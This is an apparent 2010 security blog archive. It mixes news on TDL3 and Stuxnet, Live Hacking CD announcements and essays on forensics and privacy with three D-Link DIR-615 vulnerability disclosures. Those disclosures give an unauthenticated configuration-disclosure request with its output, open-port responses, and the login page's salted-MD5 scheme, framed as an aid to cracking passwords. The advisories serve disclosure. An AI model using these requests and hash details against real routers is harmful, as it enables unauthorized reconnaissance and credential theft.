Until now there hasn’t been a rootkit which explicitly attacks machines running a 64-bit version of Microsoft Windows. But now the TDL3 rootkit has been updated to infect Windows Vista 64 bit and Windows 7 64 bit.
Read the full story here.
Stuxnet: The Industrial Sabotage Mystery Deepens
November 16, 2010 By
Since its discovery a few months ago, the purpose and intention of the Stuxnet worm has remained shrouded in mystery. This Windows based worm is the first ever malware designed to attack industrial equipment.
Specifically it targets Siemens’ Supervisory Control And Data Acquisition (SCADA) software used to control and monitor industrial processes and has the ability to reprogram Siemens’ Simatic PLCs (programmable logic controllers).
PLCs contain code to control automated industrial systems in manufacturing plants or factories. Programmers use the Siemens’ software from a Windows PC to create code and then upload their code to the PLCs. The Stuxnet worm infects the PCs and then uploads its own code to the PLC.
Read the full story here.
D-link DIR-615 Device Information and Configuration Vulnerability
October 31, 2010 By
Overview:
General device configuration and information such as UDN, services, service ID, Control URL and other detailed information from a D-Link DIR-615 Wireless N 300 router can be accessed by fetching root.sxml using a web browser.
Description:
Attacker can gain remote access to the D-Link DIR-615 Wireless N 300 router, general device information and configuration by fetching root.sxml file.
Exploit Syntax: http://deviceIP/root.sxml
Exploit Output for device with IP 192.168.150.1:
−<root> −<specVersion> <major>1</major> <minor>0</minor> </specVersion> <URLBase>http://192.168.150.1</URLBase> −<device> −<deviceType> urn:schemas-upnp-org:device:InternetGatewayDevice:1 </deviceType> <presentationURL>/</presentationURL> <friendlyName>Wireless N Router</friendlyName> <manufacturer>D-Link Systems</manufacturer> <manufacturerURL>http://www.dlink.com</manufacturerURL> <modelDescription>Wireless N Router</modelDescription> <modelName>Wireless N Router</modelName> <modelNumber>DIR-615</modelNumber> <modelURL>http://www.dlink.com</modelURL> <serialNumber>none</serialNumber> <UDN>uuid:280BA93F-BC7B-336E-8F78-733C78667090</UDN> <UPC>00000-00001</UPC> −<serviceList> −<service> <serviceType>urn:schemas-upnp-org:service:Layer3Forwarding:1</serviceType> <serviceId>urn:upnp-org:serviceId:L3Forwarding1</serviceId> <controlURL>http://192.168.150.1:4444/l3fw</controlURL> <eventSubURL>http://192.168.150.1:9393/l3fw</eventSubURL> <SCPDURL>http://192.168.150.1/l3fw.xml</SCPDURL> </service> </serviceList> −<deviceList> −<device> <deviceType>urn:schemas-upnp-org:device:WANDevice:1</deviceType> <friendlyName>Wireless N Router</friendlyName> <manufacturer>D-Link Systems</manufacturer> <manufacturerURL>http://www.dlink.com</manufacturerURL> <modelDescription>Wireless N Router</modelDescription> <modelName>Wireless N Router</modelName> <modelNumber>DIR-615</modelNumber> <modelURL>http://www.dlink.com</modelURL> <serialNumber>none</serialNumber> <UDN>uuid:616CA787-7B12-39B7-836B-9DDF50280572</UDN> <UPC>00000-00001</UPC> −<serviceList> −<service> −<serviceType> urn:schemas-upnp-org:service:WANCommonInterfaceConfig:1 </serviceType> <serviceId>urn:upnp-org:serviceId:WANCommonIFC1</serviceId> <controlURL>http://192.168.150.1:4444/wcommifc</controlURL> <eventSubURL>http://192.168.150.1:9393/wcommifc</eventSubURL> <SCPDURL>http://192.168.150.1/WANCommonIFC1.xml</SCPDURL> </service> </serviceList> −<deviceList> −<device> <deviceType>urn:schemas-upnp-org:device:WANConnectionDevice:1</deviceType> <friendlyName>Wireless N Router</friendlyName> <manufacturer>D-Link Systems</manufacturer> <manufacturerURL>http://www.dlink.com</manufacturerURL> <modelDescription>Wireless N Router</modelDescription> <modelName>Wireless N Router</modelName> <modelNumber>DIR-615</modelNumber> <modelURL>http://www.dlink.com</modelURL> <serialNumber>none</serialNumber> <UDN>uuid:C730E975-C618-3CC8-A0D8-92913DD5EC5E</UDN> <UPC>00000-00001</UPC> −<serviceList> −<service> <serviceType>urn:schemas-upnp-org:service:WANIPConnection:1</serviceType> <serviceId>urn:upnp-org:serviceId:WANIPConn1</serviceId> <controlURL>http://192.168.150.1:4444/wipconn</controlURL> <eventSubURL>http://192.168.150.1:9393/wipconn</eventSubURL> <SCPDURL>http://192.168.150.1/WANIPConn1.xml</SCPDURL> </service> </serviceList> </device> </deviceList> </device> −<device> <deviceType>urn:schemas-wifialliance-org:device:WFADevice:1</deviceType> <presentationURL>/</presentationURL> <friendlyName>WFADevice</friendlyName> <manufacturer>D-Link Systems</manufacturer> <manufacturerURL>http://www.dlink.com</manufacturerURL> <modelDescription>Wireless N Router</modelDescription> <modelName>Wireless N Router</modelName> <modelNumber>DIR-615</modelNumber> <modelURL>http://www.dlink.com</modelURL> <serialNumber>none</serialNumber> <UDN>uuid:5B0240B4-5042-3757-A05A-51DBD8DF789E</UDN> <UPC>00000-00001</UPC> −<serviceList> −<service> −<serviceType> urn:schemas-wifialliance-org:service:WFAWLANConfig:1 </serviceType> <serviceId>urn:wifialliance-org:serviceId:WFAWLANConfig1</serviceId> <controlURL>http://192.168.150.1:8832/wfawc</controlURL> <eventSubURL>http://192.168.150.1:8456/wfawc</eventSubURL> <SCPDURL>http://192.168.150.1/WFAwc.xml</SCPDURL> </service> </serviceList> </device> </deviceList> </device>
</root>
Impact:
Important device information and general configuration will be revealed without proper authorization.
Solution:
I am currently unaware of a solution to this problem.
Vendor Information:
http://www.dlink.com/products/?pid=565
Product Details:
D-Link Wireless access point
Product Page DIR-615
Hardware Version :B2
Firmware Version: 2.25
CERT(R) Coordination Center Tracking Code: VU#944927 Date: 01/10/2010
D-link DIR-615 Open Ports Vulnerability
October 31, 2010 By
Overview:
TCP ports 4444, 8099, 8456, 8832 and 9393 are open in D-Link DIR-615 Wireless N 300 router. The above mentioned ports could be used for a remote connection by HTTP or Telnet protocols.
Description:
TCP ports 4444, 8099, 8456, 8832 and 9393 are open in D-Link DIR-615 Wireless N 300 router.
TCP 4444: A remote connection attempt to this port returns the following reply from the device that appears to be in XML format:
−<soap:Envelope soap:encodingStyle=”http://schemas.xmlsoap.org/soap/encoding/”> −<soap:Body> −<soap:Fault> <faultcode>s:Client</faultcode> <faultstring>UPnPError</faultstring> −<detail> −<UPnPError> <errorCode>500</errorCode> <errorDescription>Invalid Action</errorDescription> </UPnPError> </detail> </soap:Fault> </soap:Body> </soap:Envelope>
This port has been registered with IANA for krb524.
TCP 8099: A remote connection attempt to this port returns the following reply from the device that appears to be in XML format and contain the device setting:
−<soap:Envelope soap:encodingStyle=”http://schemas.xmlsoap.org/soap/encoding/”> −<soap:Body> −<GetDeviceSettingsResponse> <GetDeviceSettingsResult>OK</GetDeviceSettingsResult> <Type>GatewayWithWiFi</Type> <DeviceName>D-Link Systems DIR-615</DeviceName> <VendorName>D-Link Systems</VendorName> <ModelDescription>Wireless N Router</ModelDescription> <ModelName>DIR-615 B2</ModelName> <FirmwareVersion>2.25, 2008/05/16</FirmwareVersion> <PresentationURL>/Status/Device_Info.shtml</PresentationURL> −<SOAPActions> <string>http://purenetworks.com/HNAP1/GetDeviceSettings</string> <string>http://purenetworks.com/HNAP1/SetDeviceSettings</string> <string>http://purenetworks.com/HNAP1/GetWanSettings</string> <string>http://purenetworks.com/HNAP1/SetWanSettings</string> <string>http://purenetworks.com/HNAP1/GetWanStatus</string> −<string> http://purenetworks.com/HNAP1/RestoreFactoryDefaults </string> <string>http://purenetworks.com/HNAP1/IsDeviceReady</string> <string>http://purenetworks.com/HNAP1/Reboot</string> <string>http://purenetworks.com/HNAP1/AddPortMapping</string> <string>http://purenetworks.com/HNAP1/DeletePortMapping</string> <string>http://purenetworks.com/HNAP1/GetPortMappings</string> <string>http://purenetworks.com/HNAP1/GetMACFilters2</string> <string>http://purenetworks.com/HNAP1/SetMACFilters2</string> <string>http://purenetworks.com/HNAP1/GetRouterLanSettings</string> <string>http://purenetworks.com/HNAP1/SetRouterLanSettings</string> <string>http://purenetworks.com/HNAP1/GetConnectedDevices</string> <string>http://purenetworks.com/HNAP1/GetNetworkStats</string> <string>http://purenetworks.com/HNAP1/GetWLanSettings24</string> <string>http://purenetworks.com/HNAP1/SetWLanSettings24</string> <string>http://purenetworks.com/HNAP1/GetWLanSecurity</string> <string>http://purenetworks.com/HNAP1/SetWLanSecurity</string> </SOAPActions> <SubDeviceURLs/> −<Tasks> −<TaskExtension> <Name>Wireless Settings</Name> <URL>/Basic/Wireless.shtml</URL> <Type>Browser</Type> </TaskExtension> −<TaskExtension> <Name>Block Network Access</Name> <URL>/Advanced/MAC_Address_Filter.shtml</URL> <Type>Browser</Type> </TaskExtension> −<TaskExtension> <Name>Parental Controls</Name> <URL>/Advanced/Access_Control.shtml</URL> <Type>Browser</Type> </TaskExtension> −<TaskExtension> <Name>D-Link Tech Support</Name> −<URL> http://support.dlink.com/products/view.asp?productid=DIR%2D635 </URL> <Type>Browser</Type> </TaskExtension> −<TaskExtension> <Name>Reboot Router</Name> <URL>/Tools/System.shtml</URL> <Type>Silent</Type> </TaskExtension> </Tasks> </GetDeviceSettingsResponse> </soap:Body> </soap:Envelope>
This port has not been registered with IANA.
TCP 8456: A remote connection attempt with telnet to this port returns the following error after a successful connection:
HTTP/1.1 501 Internal Server Error SERVER: ipOS/7.4 UPnP/1.0 ipGENADevice/1.0 HTTP/1.1 500 Server Error
This port has not been registered with IANA.
TCP 8832: A remote connection attempt by telnet to this port returns the following error after a successful connection:
HTTP/1.1 500 Server Error
This port has not been registered with IANA.
TCP 9393: A remote connection attempt by telnet to this port returns the following error after a successful connection:
HTTP/1.1 501 Internal Server Error SERVER: ipOS/7.4 UPnP/1.0 ipGENADevice/1.0 HTTP/1.1 500 Server Error
This port has not been registered with IANA
Impact:
The above mentioned ports provide remote access to the attacker and reveal technical information about the device and its configurations. Further, ports 8456, 8832 and 9393 could be used for a denial of service attack
Solution:
I am currently unaware of a solution to this problem.
Vendor Information:
http://www.dlink.com/products/?pid=565
Product Details:
D-Link Wireless access point
Product Page DIR-615
Hardware Version :B2
Firmware Version: 2.25
CERT(R) Coordination Center Tracking Code: VU#944927 Date: 01/10/2010
Vulnerability: D-link DIR-615 User Name and Password Security Mechanisms
October 31, 2010 By
Overview
D-Link DIR-615 console login page contains information about the security mechanism used to encrypt the user name and passwords.
Description
D-Link DIR-615 Wireless N 300 router uses Java Script in its console login page to implement a series of security mechanisms to prevent sending the user name and password in clear text. It salts the user’s password with an 8 characters long salt string of “2bcfc20f”. Then the password is padded to 16 characters and appended to the salt characters and padded further to 63 characters. Finally, it appends a “U” to the user account and “\x01” to an admin login account and produces an MD5 hash of the user or admin account.
Code
<!– InstanceBeginEditable –>
<script src=”/md5.js”></script>
<script>
//<![CDATA[
function page_load()
{
/* Detect browsers that cannot handle XML methods. */
if (!document.getElementsByTagName || !((document.implementation && document.implementation.createDocument) || window.ActiveXObject)) {
alert ("Your web browser is too old to use this web site. Please upgrade your browser.");
return;
}/* For debugging on a local client. */
if ("" != "") {
hide_all_ssi_tr();
}
document.forms.myform.password.focus();
}function data_ready(xml)
{
var status = xml.getElementData("login");
if (status) {
if (status == "timeout") {
alert("Session timeout, please try again.");
location.replace ('/');
} else if (status == "error") {
alert("Invalid password, please try again.");
location.replace ('/');
} else {
location.replace ('/' + status);
}
}
}function data_timeout()
{
/* We did not get a reply from the server, the connection is likely down. */
alert ("The network connection seems to be down. Press 'Ok' to try again.");
location.reload(true);
}function send_login()
{
/* Salt in hex, 8 chars long. */
var salt = "2bcfc20f";var password = document.forms.myform.password.value.substr(0,16);
document.forms.myform.password.value = ""; // Make sure password never gets sent as clear text/* Pad the password to 16 chars. */
for (var i = password.length; i < 16; i++) {
password += String.fromCharCode(1);
}/* Append the password to the salt and pad the result to 63 bytes. */
var input = salt + password;
for (var i = input.length; i < 63; i++) {
input += String.fromCharCode(1);
}/* Append a 'U' for user login, or a '\x01' for admin login. */
input += (document.forms["myform"].username.value == ‘user’) ? ‘U’ : String.fromCharCode(1);/* MD5 hash of the salt. */
var hash = hex_md5(input);/* Append the MD5 hash to the salt. */
var login_hash = salt.concat(hash);/* Send the login hash to the server. */
var xmlobj = new xmlDataObject(data_ready, data_timeout, 6000, “/post_login.xml?hash=” + login_hash);
if (!xmlobj) {
/* Browser does not support XML DOM. */
alert (“Your web browser is too old to use this web site. Please upgrade your browser.”);
return;
}
xmlobj.retrieveData();
}//]]>
</script>
<!– InstanceEndEditable –>
Impact
The used security mechanisms have been implemented as Java Script and its prone to the end user access remotely. In addition, the attacker can intercept the communication of the user or admin account and use the described mechanisms to crack the password.
Solution
I am currently unaware of a solution to this problem. (Note: Device control panel does not support HTTPS)
http://www.dlink.com/products/?pid=565
Product Details:
D-Link Wireless access point
Product Page DIR-615
Hardware Version :B2
Firmware Version: 2.25
CERT(R) Coordination Center Tracking Code: VU#944927 Date: 01/10/2010
Live Hacking 1.2 : 2,600 Downloads
September 23, 2010 By
I am very excited to share with you the latest download figures for the Live Hacking 1.2 Linux distribution. I posted V1.2 less than one month ago and there has been a staggering 2,600 downloads (and rising).
For those of you that don’t know, the Live Hacking CD is a Linux distribution packed with tools for ethical hacking and penetration testing. New in V1.2 is the metasploit penetration testing framework and some new IPv6 tools.
The Live Hacking CD is a ‘Live CD’ that runs directly from the CD and doesn’t need to be installed on your hard-drive. Once booted you can use the included tools to perform penetration tests and ethically hack on your own network to ensure that it is secure from outside intruders. As well as the standard Linux networking tools the Live Hacking CD has tools for DNS enumeration and reconnaissance as well as utilities for foot-printing, password cracking and network sniffing. It also has programs for spoofing and a set of wireless networking utilities.
You can read more about the Live Hacking CD here:
The Future of Cybercrime Forensics
September 1, 2010 By
Cybercrime Forensic investigation is a complicated science with its own history, implications and future. It is not sufficient merely to consider it a branch of criminology, or the study of cyber criminal behavior, or research into the relationship between the causes of tech related crime and social policies. For cyber criminals, their knowledge and their crimes are bound together. The possible suspects are rich in knowledge and technical skills. They have mastered the technology better than the technology’s creators, and they know how to use technology against technology.
A multidisciplinary approach is required to fully foresee the future of cybercrime forensics. It requires a team of specialists from different disciplines within the IT industry and related industrial and social segments such as telecom and law. However, in this article the author looks at the future of cybercrime forensics based on his knowledge and experience in this field.
Cybercrime Forensics for Governments
Cybercrime forensics at the governmental level will be more complicated in the future. Governments will need to turn more to their national security organisations to hunt down cyber criminals. In addition, they will need to invent anti-forensic tools and methods to keep their activities and information assets secret.
Cyberspace security and computer related technologies will be a real challenge for governments. The platforms and protocols for computer related technologies may have both domestic and international uses. Therefore, it will be difficult for governments to reach an agreement for international cyber security policies.
At the same time, some countries are the technology owners and this intellectual property ownership will give them an advantage compared to other countries without such a privilege. The technology ownership issue will force the other countries to utilise the open source platforms to develop their own customised operating systems and software.
Cybercrime Forensics for Corporates
Currently the cybercrime forensic markets have been dominated by a few companies. These are the pioneers in cybercrime forensics and analysis. They have the tools and the solutions for cyber forensic investigation. They train law enforcement agencies to use their tools and solutions and some of them even have special tools just for governmental use.
There are also many small companies with one or two consultant partners who are either retired law enforcement officers or former IT professionals from Fortune 500 companies. These people use their contacts and credentials to achieve some market share. However, in the future, cybercrime forensics at the corporate level will be diversified to education and certain specialties and products. It will be difficult for small companies to build a team with the right core competencies. In addition, due to security clearance requirements and national security interests, most of these companies will only practice in their country of origin.
Furthermore, information security standards such as ISO27001 and ITIL will be implemented more in medium to enterprise size companies. Realistically, only these companies can afford the cost of compliance implementation. Therefore, it will be necessary for them to have proper incident response procedures and the corresponding cyber forensic investigation capabilities. These companies may well have their own cyber forensic investigation units.
Cybercrime Forensics in Professional Institutions
Cybercrime forensics is a new battle ground for professional institutions. Currently, there is no real internationally recognised authority to govern cybercrime forensics practices, regulations and certification. Therefore, professional institutions are offering cybercrime forensic investigation training programs, certifications and conferences. Currently, some of these institutions are forming alliances (as trade and training partners) to achieve their sales targets. In the future, it is likely that these institutions will start to attack each other to gain market share.
Cybercrime Forensics in Universities
It is sad to note that more and more often information technology advances are coming from industry rather than universities. Within IT, a few companies dominate the industry and therefore the innovations. It will be the same for cybercrime forensics; the companies with market share have the money for research and development. The main issue with academic institutions is their approach, which is slow and traditional compared to the faster speed of development and implementation found in industry.
Furthermore, the training programs in universities are not aligned with the current job market and industry needs. The university students have a lack of practical knowledge compared to the IT professionals who are in the industry (and possibly without academic studies). This is the major reason why students choose further training to achieve professional certification and so distinguish themselves from other graduates.
Cybercrime Forensics in the Media
There will be more magazines, websites and blogs specialising in cybercrime forensics and analysis. They will be the voice of the industry with the power to review, promote and criticise books, products, solutions and training programs. They will sell advertising and help vendors sell their products. Whoever has more marketing budget and better relations will be the most successful in the cybercrime forensics industry. Nevertheless, there will be one or two magazines and websites that will remain independent, but they will find it difficult to survive in such a tough market.
Cybercrime Forensics and Technical Trends
The market will be divided to four main segments with specialised service providers for each segment. The segments are: Microsoft Windows related products, UNIX & Linux related products, Apple related products and computer network & telecom related products.
The solution providers will create more comprehensive tools and solutions to gain better market share. They will transform their solutions into a set of tools for non-IT professionals. They will also try to make their tools web based, for remote forensic investigations.
The open source community will be active for the UNIX & Linux platforms to accrue required legislation to accredit the open source tools in the various countries and judicial systems.
Apple created a giant market for those who want to develop Apple device related tools and solutions. This will be a new era for the professionals who are working in cybercrime forensics.
Cloud computing, cellular networks, WiMax and virtualization will be the other areas of the interest for study and product development. It is obvious that everything is merging towards IT and cyberspace plays an important role in the near future. This will lead governments and authorities to pursue other methods of intelligence gathering, such as web and data mining, to protect their interests.
This will lead to the biggest privacy issue in history. All the data communication, of all users, will be logged at the carrier level. Then the authorities will use data mining tools to identify suspicious behavior of a particular user or users in their own or an allies’ territory. All this information will be saved in massive databases and then the commercial, financial and personal information, in addition to the communication records and social behaviors, will be linked together.
And this will ultimately lead to a new chapter in the history of cybercrime forensics, namely Applied Artificial Intelligence in Cybercrime Forensics.
Live Hacking V1.2 Released
August 25, 2010 By
I am pleased to announce an update to the Live Hacking CD. The updated Live CD contains the tools and utilities you need to test and hack your own network in the same way a malicious hacker would. New in this version is the metasploit penetration testing framework and a range of IPv6 foot-printing tools.
The Live Hacking CD is a ‘Live CD’ meaning that it loads and runs directly from the CD and doesn’t need installing on your hard disk.
The metasploit framework, one of the new tools included with this release, can be used to test your network using the frameworks internal database of known weaknesses and exploits. Also included in this new release of the Live Hacking CD is the THC-IPV6 tool, a set of tools to attack the inherent protocol weaknesses of IPv6 and ICMP6.
See http://LiveHacking.com for more details.
Excuse Me, There is No Private Browsing!
August 11, 2010 By
From my point of view, there is no privacy as long as a user is connected to the Internet or a public network. Public networks such as the Internet, PSTNs and cellular networks are part of national and international telecommunication networks. These are the channels in which information flows from one side of the world to the other along with radio and satellite communications.
Currently, the Internet is one of the best communication channels available due to its capability, speed and cost. At the same time, it is the perfect place for the criminally minded to commit crimes or play under the radar. Because of this, the Internet is a place where the end-user needs to watch his/her activities and the law enforcement agencies need to watch the end-user. This paradox has created two market segments for software vendors, one to protect the end-user and other to violate the end-user’s privacy.
There are many often contradictory or complementary paradigms in IT security. Tools such as anti-virus, personal firewalls and private browsing functions are common examples of end-user privacy protection. But tools and appliances such as content monitoring systems, network traffic analyzers, data aggregators and cyber forensic tools can be used to violate end-user’s privacy.
The above mentioned tools have been built by engineers and IT practitioners. The functionality and the quality of these tools can be miss-judged, it has been known for engineers to change the functionality of a tool under political pressures by governmental regulatory authorities. But the end-user, who uses these tools or functions to enhance their online security, has no idea about such influences and pressures.
A recent research report about the private browsing functionality of the common Internet browsers is a good example. Millions of users trust the privacy mode on their browser, but the report shows that none of them are functioning at 100%, and it seems that nobody can be held accountable.
Blackberry Is Not Alone
August 4, 2010 By
There has been lots of recent news and articles about Blackberry service suspensions. India, the United Arab Emirates, Kuwait and the Kingdom of Saudi are all countries with national security concerns. These countries work to defend their national security interests, as does the USA and other western countries. It is important to respect such decisions and their requirements as long as other western countries or technology owners reserve the right to do the same.
All Research In Motion (RIM) facilities are in western countries and all the communication data is sent over the Internet and the Blackberry network. Although, data communications are encrypted within the Blackberry network, they can be aggregated at RIM’s facilities. Furthermore, those countries which host RIM facilities have the legal right to access RIM’s premises and cryptography algorithms for national security or regular monitoring.
Some countries, like the UAE, use Blackberry devices widely in their governmental institutions. Which raises questions about access to data which has been transferred over the RIM network especially with regards to criminal investigations and national security protection.
However the Blackberry is not alone. We should not forget other services such as the Nokia Messaging Service. This service is Nokia-hosted for Nokia devices. With one Nokia device, users can manage all their email, IM and social networking accounts. In other words, it provides services similar to that of RIM’s, but only for Nokia users.
It is obvious if RIM is a threat to national security because of its cloud network and infrastructure then similar services such as the Nokia Messaging Service have the same issues.
